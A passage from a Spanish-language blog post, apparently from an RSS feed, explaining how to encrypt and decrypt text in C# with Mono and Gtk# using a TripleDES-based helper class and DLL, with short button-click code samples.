<p>Define un objeto contenedor para obtener acceso a la versión del proveedor de servicios criptográficos (CSP) del algoritmo TripleDES (algoritmo que hace triple cifrado del algoritmo Data Encryption Standard) No se puede heredar esta clase.</p>
<p><b>CipherMode (Enumeración)</b></p>
<p>Especifica el modo de cifrado de bloques que se utilizará para cifrar.<br />
PaddingMode (Enumeración)</p>
<p>Especifica el tipo de relleno que se aplica cuando el bloque de datos del mensaje es más pequeño que el número total de bytes necesarios para una operación criptográfica.</p>
<p><b>ICryptoTransform (Interfaz)</b></p>
<p>Define las operaciones básicas de las transformaciones criptográficas.</p>
<p>Gracias al <b>proyecto mono</b>, podemos crear esta clase y liberarla bajo la licencia GPL.</p>
<p>Aquí les dejo la clase cifrado ya codificada: <a href="http://www.antoniomtz.org/files/cifrado.cs">cifrado.cs</a></p>
<p>Para comenzar, creamos un proyecto nuevo C# con Gtk# en Monodevelop y creamos una forma más ó menos como ésta:</p>
<p><center><img src="http://www.antoniomtz.org/files/encriptacion.png"></center></p>
<p>Para facilitar mejor las cosas he creado una <b>dll</b> con las clases para encriptar y desencriptar, primero nos descargamos la dll: <a href="http://www.antoniomtz.org/files/criptologia.dll">criptologia.dll</a>, luego la agregamos como referencia a nuestro proyecto dando click derecho en <b>Referencias</b> y luego <b>Editar preferencias&#8230;</b> .:</p>
<p><center><img src="http://farm3.static.flickr.com/2107/2469412309_6ec38cbca4.jpg"></center></p>
<p>Ahora en el evento Click del Botón que dice encriptar, ponemos lo siguiente:</p>
<pre>
criptologia.Cifrado oCifrado = new criptologia.Cifrado();
entry2.Text = oCifrado.Encriptar(entry1.Text);
</pre>
<p>Y en el evento Click del Botón desencriptar, ponemos:</p>
<pre>
criptologia.Cifrado oCifrado = new criptologia.Cifrado();
entry3.Text = oCifrado.Desencriptar(entry2.Text);
</pre>
<p>Aquí les dejo el proyecto terminado: <a href="http://www.antoniomtz.org/files/encriptacion.zip">encriptacion.zip</a>.</p>
<p><b>Conclusión:</b></p>
<p>Con ésto podemos agregar mayor seguridad en nuestros aplicaciónes ó sistemas, gracias a mono nuestra DLL es libre y se puede utilizar con cualquier propósito, estudiar, modificar y redistribuir.</p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

